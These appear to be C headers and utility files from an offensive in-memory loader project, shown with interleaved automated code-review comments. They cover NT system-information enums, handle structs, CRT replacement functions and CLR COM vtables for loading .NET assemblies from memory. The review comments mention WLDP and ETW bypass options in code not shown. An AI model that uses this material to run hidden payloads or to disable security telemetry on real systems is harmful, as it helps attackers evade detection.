175 SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[]
176 SystemStoreInformation, // q; s: SYSTEM_STORE_INFORMATION // SmQueryStoreInformation
177 SystemRegistryAppendString, // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110
178 SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)
179 SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION
180 SystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation
181 SystemNativeBasicInformation, // not implemented
182 SystemErrorPortTimeouts, // SYSTEM_ERROR_PORT_TIMEOUTS
183 SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION
184 SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation
185 SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION
186 SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)
187 SystemSystemPtesInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120
188 SystemNodeDistanceInformation,
189 SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26
190 SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation
191 SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1
192 SystemSessionBigPoolInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8
193 SystemBootGraphicsInformation, // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only)
194 SystemScrubPhysicalMemoryInformation, // q; s: MEMORY_SCRUB_INFORMATION
195 SystemBadPageInformation,
196 SystemProcessorProfileControlArea, // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA
197 SystemCombinePhysicalMemoryInformation, // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130
198 SystemEntropyInterruptTimingInformation,
199 SystemConsoleInformation, // q: SYSTEM_CONSOLE_INFORMATION
200 SystemPlatformBinaryInformation, // q: SYSTEM_PLATFORM_BINARY_INFORMATION
201 SystemPolicyInformation, // SYSTEM_POLICY_INFORMATION
202 SystemHypervisorProcessorCountInformation, // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION
203 SystemDeviceDataInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
204 SystemDeviceDataEnumerationInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
205 SystemMemoryTopologyInformation, // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION
206 SystemMemoryChannelInformation, // q: SYSTEM_MEMORY_CHANNEL_INFORMATION
207 SystemBootLogoInformation, // q: SYSTEM_BOOT_LOGO_INFORMATION // 140
208 SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE
209 SystemCriticalProcessErrorLogInformation,
210 SystemSecureBootPolicyInformation, // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION
211 SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX
212 SystemSecureBootInformation, // q: SYSTEM_SECUREBOOT_INFORMATION
213 SystemEntropyInterruptTimingRawInformation,
214 SystemPortableWorkspaceEfiLauncherInformation, // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION
215 SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)
216 SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX
217 SystemBootMetadataInformation, // 150
218 SystemSoftRebootInformation, // q: ULONG
219 SystemElamCertificateInformation, // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION
220 SystemOfflineDumpConfigInformation,
221 SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION
222 SystemRegistryReconciliationInformation, // s: NULL (requires admin) (flushes registry hives)
223 SystemEdidInformation,
224 SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD
225 SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION
226 SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION
227 SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160
228 SystemVmGenerationCountInformation,
229 SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION
230 SystemKernelDebuggerFlags, // SYSTEM_KERNEL_DEBUGGER_FLAGS
231 SystemCodeIntegrityPolicyInformation, // q: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION
232 SystemIsolatedUserModeInformation, // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION
233 SystemHardwareSecurityTestInterfaceResultsInformation,
234 SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION
235 SystemAllowedCpuSetsInformation,
236 SystemVsmProtectionInformation, // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation)
237 SystemInterruptCpuSetsInformation, // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170
238 SystemSecureBootPolicyFullInformation, // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION
239 SystemCodeIntegrityPolicyFullInformation,
240 SystemAffinitizedInterruptProcessorInformation,
241 SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION
242 SystemCpuSetInformation, // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2
243 SystemCpuSetTagInformation, // q: SYSTEM_CPU_SET_TAG_INFORMATION
244 SystemWin32WerStartCallout,
245 SystemSecureKernelProfileInformation, // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION
246 SystemCodeIntegrityPlatformManifestInformation, // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE
247 SystemInterruptSteeringInformation, // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180
248 SystemSupportedProcessorArchitectures,
249 SystemMemoryUsageInformation, // q: SYSTEM_MEMORY_USAGE_INFORMATION
250 SystemCodeIntegrityCertificateInformation, // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION
251 SystemPhysicalMemoryInformation, // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2
252 SystemControlFlowTransition,
253 SystemKernelDebuggingAllowed, // s: ULONG
254 SystemActivityModerationExeState, // SYSTEM_ACTIVITY_MODERATION_EXE_STATE
255 SystemActivityModerationUserSettings, // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS
256 SystemCodeIntegrityPoliciesFullInformation,
257 SystemCodeIntegrityUnlockInformation, // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190
258 SystemIntegrityQuotaInformation,
259 SystemFlushInformation, // q: SYSTEM_FLUSH_INFORMATION
260 SystemProcessorIdleMaskInformation, // q: ULONG_PTR // since REDSTONE3
261 SystemSecureDumpEncryptionInformation,
262 SystemWriteConstraintInformation, // SYSTEM_WRITE_CONSTRAINT_INFORMATION
263 SystemKernelVaShadowInformation, // SYSTEM_KERNEL_VA_SHADOW_INFORMATION
264 SystemHypervisorSharedPageInformation, // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4
265 SystemFirmwareBootPerformanceInformation,
266 SystemCodeIntegrityVerificationInformation, // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION
267 SystemFirmwarePartitionInformation, // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200
268 SystemSpeculationControlInformation, // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above.
269 SystemDmaGuardPolicyInformation, // SYSTEM_DMA_GUARD_POLICY_INFORMATION
270 SystemEnclaveLaunchControlInformation, // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION
271 SystemWorkloadAllowedCpuSetsInformation, // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5
272 SystemCodeIntegrityUnlockModeInformation,
273 SystemLeapSecondInformation, // SYSTEM_LEAP_SECOND_INFORMATION
274 SystemFlags2Information, // q: SYSTEM_FLAGS_INFORMATION
275 SystemSecurityModelInformation, // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1
276 SystemCodeIntegritySyntheticCacheInformation,
277 SystemFeatureConfigurationInformation, // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210
278 SystemFeatureConfigurationSectionInformation, // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION
279 SystemFeatureUsageSubscriptionInformation,
280 SystemSecureSpeculationControlInformation, // SECURE_SPECULATION_CONTROL_INFORMATION
281 // SystemSpacesBootInformation = 214,
282 // SystemFwRamdiskInformation = 215,
283 // SystemWheaIpmiHardwareInformation = 216,
284 // SystemDifSetRuleClassInformation = 217,
285 // SystemDifClearRuleClassInformation = 218,
286 // SystemDifApplyPluginVerificationOnDriver = 219,
287 // SystemDifRemovePluginVerificationOnDriver = 220,
288 // SystemShadowStackInformation = 221, // SYSTEM_SHADOW_STACK_INFORMATION
289 // SystemBuildVersionInformation = 222, // SYSTEM_BUILD_VERSION_INFORMATION
290 MaxSystemInfoClass
291 } SYSTEM_INFORMATION_CLASS;
292
293 typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
294 {
295 PVOID Object;
296 ULONG_PTR UniqueProcessId;
297 ULONG_PTR HandleValue;
298 ULONG GrantedAccess;
299 USHORT CreatorBackTraceIndex;
300 USHORT ObjectTypeIndex;
301 ULONG HandleAttributes;
302 ULONG Reserved;
303 } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
304
305 typedef struct _SYSTEM_HANDLE_INFORMATION_EX
306 {
307 ULONG_PTR NumberOfHandles;
308 ULONG_PTR Reserved;
309 SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
310 } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
311
312 #endif
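Review bot: The two "used by" comments in this header do not match the code in the part of bypass.c visible in this commit. `// Use by BYPASS_WLDP_A` sits above `WLDP_HOST_ID` / `WLDP_HOST_INFORMATION`, but the only visible reference to `PWLDP_HOST_INFORMATION` is the `WldpIsClassInApprovedListStub` prototype under `BYPASS_WLDP_B`; that comment should read `// Used by BYPASS_WLDP_B`. The `BYPASS_ETW_B` version of `DisableETW` shown there does not reference `SYSTEM_INFORMATION_CLASS` or the `SYSTEM_HANDLE_*` structs, so `// Used by BYPASS_ETW_B` should either name the build option that needs them or go away together with the block. These types are also declared unconditionally under names the Windows SDK headers use, which presumably risks a redefinition error if `winternl.h` or a similar header is ever included in the same unit, so a guard would help. The dead `//#include <ntstatus.h>` line can be removed.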
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, uint32_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = (unsigned char)value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, uint32_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, uint32_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
74
75 int compare(const char *s1, const char *s2) {
76 while(*s1 && *s2) {
77 if(*s1 != *s2) {
78 return 0;
79 }
80 s1++; s2++;
81 }
82 return *s2 == 0;
83 }
84
85 const char* _strstr(const char *s1, const char *s2) {
86 while (*s1) {
87 if((*s1 == *s2) && compare(s1, s2)) return s1;
88 s1++;
89 }
90 return NULL;
91 }
92
93 int _strcmp(const char *str1, const char *str2) {
94 while (*str1 && *str2) {
95 if(*str1 != *str2) break;
96 str1++; str2++;
97 }
98 return (int)*str1 - (int)*str2;
99 }
100
101 int stricmp(const char *str1, const char *str2) {
102 while (*str1 && *str2) {
103 if ((*str1 | 0x20) != (*str2 | 0x20)) {
104 return 0;
105 }
106 str1++; str2++;
107 }
108 return *str2 == 0;
109 }
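Review bot: `stricmp` (lines 101-109) folds case with `| 0x20` on every byte, so non-letter pairs that differ only in bit 5 compare as equal: `@` and a backtick, `[` and `{`, `_` and DEL. It also returns 1 on a match, including when `str2` is only a prefix of `str1`, which is the reverse of the C runtime `stricmp` contract whose name it reuses; a caller expecting 0-on-equal would read the result backwards. I would fold letters only, applying `c = (c >= 'A' && c <= 'Z') ? (c | 0x20) : c;` to both sides before comparing, and add a comment such as `// returns 1 if str2 is a case-insensitive prefix of str1, else 0 (not CRT semantics)`. `compare` has the same prefix-match semantics, and `_strstr` returns NULL rather than `s1` for an empty needle; each deserves a one-line comment saying so.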
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
